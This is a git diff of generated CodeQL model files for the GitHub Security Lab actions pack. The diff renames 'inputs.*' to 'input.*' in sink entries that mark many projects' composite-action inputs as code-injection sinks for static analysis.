40adbe1fc29b..d9d492f79cd5 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["homebrew/actions", "*", "inputs.casks", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.formulae", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.signing_key", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.workflow-name", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.collapse", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.step_name", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.result_path", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.workdir", "code-injection", "generated"] - - ["homebrew/actions", "*", "inputs.script", "code-injection", "generated"] \ No newline at end of file + - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.formulae", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.signing_key", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.workflow-name", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.collapse", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.step_name", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.result_path", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.workdir", "code-injection", "generated"] + - ["homebrew/actions", "*", "input.script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index 293d8a832bd4..d3046ff1fc40 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hyperledger/aries-cloudagent-python", "*", "inputs.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file + - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index c72000641cec..845fba40a6cf 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["hyperledger/fabric-samples", "*", "inputs.ca-version", "code-injection", "generated"] - - ["hyperledger/fabric-samples", "*", "inputs.fabric-version", "code-injection", "generated"] - - ["hyperledger/fabric-samples", "*", "inputs.k9s-version", "code-injection", "generated"] \ No newline at end of file + - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "input.fabric-version", "code-injection", "generated"] + - ["hyperledger/fabric-samples", "*", "input.k9s-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index 53929ab8ed1a..bcf51805710b 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["igniterealtime/openfire", "*", "inputs.domain", "code-injection", "generated"] - - ["igniterealtime/openfire", "*", "inputs.ip", "code-injection", "generated"] - - ["igniterealtime/openfire", "*", "inputs.distBaseDir", "code-injection", "generated"] \ No newline at end of file + - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "input.ip", "code-injection", "generated"] + - ["igniterealtime/openfire", "*", "input.distBaseDir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index 1330f370747e..e1ff1fa3497c 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["infracost/actions", "*", "inputs.behavior", "code-injection", "generated"] \ No newline at end of file + - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index d9d9c6770bc0..4c5ef712e587 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -3,16 +3,16 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.runtime", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.registry", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container-image", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_tag", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.gadget_repository", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.dnstester_image", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.image_tag", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.container_repo", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_architecture", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.kubernetes_distribution", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-step-conclusion", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-summary-suffix", "code-injection", "generated"] - - ["inspektor-gadget/inspektor-gadget", "*", "inputs.test-log-file", "code-injection", "generated"] \ No newline at end of file + - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.registry", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.container-image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.gadget_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.gadget_repository", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.dnstester_image", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.image_tag", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.container_repo", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.kubernetes_architecture", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.kubernetes_distribution", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-step-conclusion", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-summary-suffix", "code-injection", "generated"] + - ["inspektor-gadget/inspektor-gadget", "*", "input.test-log-file", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index faf1d7ed5c53..31e1f562877e 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["intel-analytics/ipex-llm", "*", "inputs.extra-dependency", "code-injection", "generated"] \ No newline at end of file + - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 12ae92c149b7..298ba1ccbe3b 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ionic-team/ionic-framework", "*", "inputs.totalShards", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.shard", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.component", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.paths", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.output", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.app", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.stencil-version", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.folder", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.tag", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.preid", "code-injection", "generated"] - - ["ionic-team/ionic-framework", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.component", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.app", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.stencil-version", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.folder", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.preid", "code-injection", "generated"] + - ["ionic-team/ionic-framework", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 610016200174..0dc57625890c 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -3,12 +3,12 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ionic-team/ionicons", "*", "inputs.paths", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.output", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.totalShards", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.shard", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.folder", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.tag", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.version", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.filename", "code-injection", "generated"] - - ["ionic-team/ionicons", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.totalShards", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.shard", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.folder", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.version", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.filename", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index 1d30610cfd12..c6fc16750f8b 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ionic-team/stencil", "*", "inputs.paths", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.output", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.tag", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.version", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.filename", "code-injection", "generated"] - - ["ionic-team/stencil", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file + - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.tag", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.version", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.filename", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 867dc33f4321..0cbbd38d4280 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ipfs/aegir", "*", "inputs.browser", "code-injection", "generated"] - - ["ipfs/aegir", "*", "inputs.docker-username", "code-injection", "generated"] - - ["ipfs/aegir", "*", "inputs.docker-token", "code-injection", "generated"] - - ["ipfs/aegir", "*", "inputs.build", "code-injection", "generated"] \ No newline at end of file + - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.docker-token", "code-injection", "generated"] + - ["ipfs/aegir", "*", "input.build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index 87b014cbdd62..acc6cb91c076 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jetbrains/jetbrainsruntime", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file + - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index f1b5e6df222e..c59e989db046 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -3,23 +3,23 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jhipster/generator-jhipster", "*", "inputs.generator-path", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-packaging", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-environment", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.executable", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jdl-entities-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.entities-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jdl-sample", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-branch", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-repository", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-directory", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-branch", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-repository", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.package-with-executable", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-directory", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.application-path", "code-injection", "generated"] - - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-packaging", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-environment", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jdl-entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jdl-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.jhipster-bom-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.package-with-executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.generator-jhipster-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index f952bd1da93c..b426dfb250da 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jsocol/django-ratelimit", "*", "inputs.django-version", "code-injection", "generated"] \ No newline at end of file + - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 977662bfa655..4a0c3c2d30f5 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["juicedata/juicefs", "*", "inputs.compress", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.storage", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.meta", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.name", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.mysql_password", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.file_test_mode", "code-injection", "generated"] - - ["juicedata/juicefs", "*", "inputs.file_total_size", "code-injection", "generated"] \ No newline at end of file + - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.meta", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.name", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.mysql_password", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.file_test_mode", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "input.file_total_size", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 4c6c92fdefda..74d0ef69f753 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jupyter/docker-stacks", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index 45c2c1d780a9..ac8762d24eab 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["keycloak/keycloak", "*", "inputs.job-name", "code-injection", "generated"] - - ["keycloak/keycloak", "*", "inputs.jobs", "code-injection", "generated"] - - ["keycloak/keycloak", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 1edfbfc94328..6df9a160ec5d 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kserve/kserve", "*", "inputs.directory", "code-injection", "generated"] - - ["kserve/kserve", "*", "inputs.deployment-mode", "code-injection", "generated"] - - ["kserve/kserve", "*", "inputs.network-layer", "code-injection", "generated"] \ No newline at end of file + - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] + - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] + - ["kserve/kserve", "*", "input.network-layer", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 658283336bd7..0c2793028a0a 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeflow/katib", "*", "inputs.experiments", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.database-type", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.training-operator", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.katib-ui", "code-injection", "generated"] - - ["kubeflow/katib", "*", "inputs.trial-images", "code-injection", "generated"] \ No newline at end of file + - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.training-operator", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.katib-ui", "code-injection", "generated"] + - ["kubeflow/katib", "*", "input.trial-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index d00b30874cce..f5bdc3d4bcc9 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeflow/training-operator", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file + - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 94ece1a58a0e..161022b8cbea 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubernetes-sigs/karpenter", "*", "inputs.k8sVersion", "code-injection", "generated"] \ No newline at end of file + - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 46d5a4383f44..391b19170293 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubernetes-sigs/kwok", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file + - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 5627a31bd904..3a45707d59ef 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubescape/kubescape", "*", "inputs.ORIGINAL_TAG", "code-injection", "generated"] - - ["kubescape/kubescape", "*", "inputs.SUB_STRING", "code-injection", "generated"] \ No newline at end of file + - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] + - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index 98d2d8bcbf7f..c2e3608f7458 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeshop/botkube", "*", "inputs.username", "code-injection", "generated"] - - ["kubeshop/botkube", "*", "inputs.access_token", "code-injection", "generated"] \ No newline at end of file + - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] + - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index 57fb2e710642..9b8e9d1e7ed4 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kyverno/kyverno", "*", "inputs.version", "code-injection", "generated"] - - ["kyverno/kyverno", "*", "inputs.sbom-name", "code-injection", "generated"] - - ["kyverno/kyverno", "*", "inputs.makefile-target", "code-injection", "generated"] \ No newline at end of file + - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "input.makefile-target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 8a216b97e1e3..954f2c346615 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lancedb/lance", "*", "inputs.repo", "code-injection", "generated"] - - ["lancedb/lance", "*", "inputs.vcpkg_token", "code-injection", "generated"] - - ["lancedb/lance", "*", "inputs.part", "code-injection", "generated"] - - ["lancedb/lance", "*", "inputs.arm-build", "code-injection", "generated"] \ No newline at end of file + - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] + - ["lancedb/lance", "*", "input.part", "code-injection", "generated"] + 